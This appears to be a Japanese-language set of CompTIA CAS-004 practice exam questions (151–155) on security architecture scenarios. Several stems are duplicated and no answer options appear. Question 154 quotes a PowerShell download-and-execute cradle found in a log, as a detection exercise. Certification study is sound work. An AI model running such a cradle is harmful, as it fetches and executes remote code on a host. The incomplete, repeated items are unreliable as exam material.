CAS-004 試験問題 151
銀行は、最新の脅威に対するセキュリティ対策を強化するためにセキュリティアーキテクトを雇いました。ソリューションは次の要件を満たす必要があります。
* 偽のウェブサイトを認識してブロックする
* 標準および非標準ポート上の暗号化されたトラフィックを復号化してスキャンします
* 検出と予防に複数のエンジンを使用する
* 中央報告システム
セキュリティ アーキテクトが提案できる最適なソリューションは次のどれですか?
* 偽のウェブサイトを認識してブロックする
* 標準および非標準ポート上の暗号化されたトラフィックを復号化してスキャンします
* 検出と予防に複数のエンジンを使用する
* 中央報告システム
セキュリティ アーキテクトが提案できる最適なソリューションは次のどれですか?
CAS-004 試験問題 152
組織の既存のインフラストラクチャには、データセンター間のサイト間 VPN が含まれています。昨年、高度な攻撃者が VPN コンセントレータのゼロデイ脆弱性を悪用しました。その結果、最高情報セキュリティ責任者 (CISO) は、VPN ソリューションに対して別のゼロデイ脆弱性が悪用された場合にサービスが失われるリスクを軽減するためにインフラストラクチャの変更を行っています。
次の設計のうち、CISO が使用するのに最適なものはどれでしょうか?
次の設計のうち、CISO が使用するのに最適なものはどれでしょうか?
CAS-004 試験問題 153
政府契約企業では、企業のリソースにアクセスできるように従業員にスマートフォンを支給しています。何人かの従業員は、業務上の理由で外国に出張する必要があり、スマートフォンにアクセスする必要があります。しかし、この企業は最近、その国の政府が自社の知的財産を強く望んでいるという情報を入手しました。
次の MDM 構成のうち、海外にいるときに侵害のリスクを最も軽減できるのはどれですか?
次の MDM 構成のうち、海外にいるときに侵害のリスクを最も軽減できるのはどれですか?
CAS-004 試験問題 154
セキュリティ アナリストは、外部向けメール サーバーへのログイン試行の失敗回数が着実に増加していることに気付きました。 ジャンプ ボックスの 1 つを調査しているときに、アナリストはログ ファイルで次の内容を特定しました: powershell EX(New-Object Net.WebClient).DownloadString ('https://content.comptia.org/casp/whois.psl');whois 次のセキュリティ コントロールのどれが警告を発し、攻撃の次のフェーズを阻止したでしょうか。
CAS-004 試験問題 155
次の用語のうち、CASB またはサードパーティ エンティティへの暗号化キーの配信を指すものはどれですか。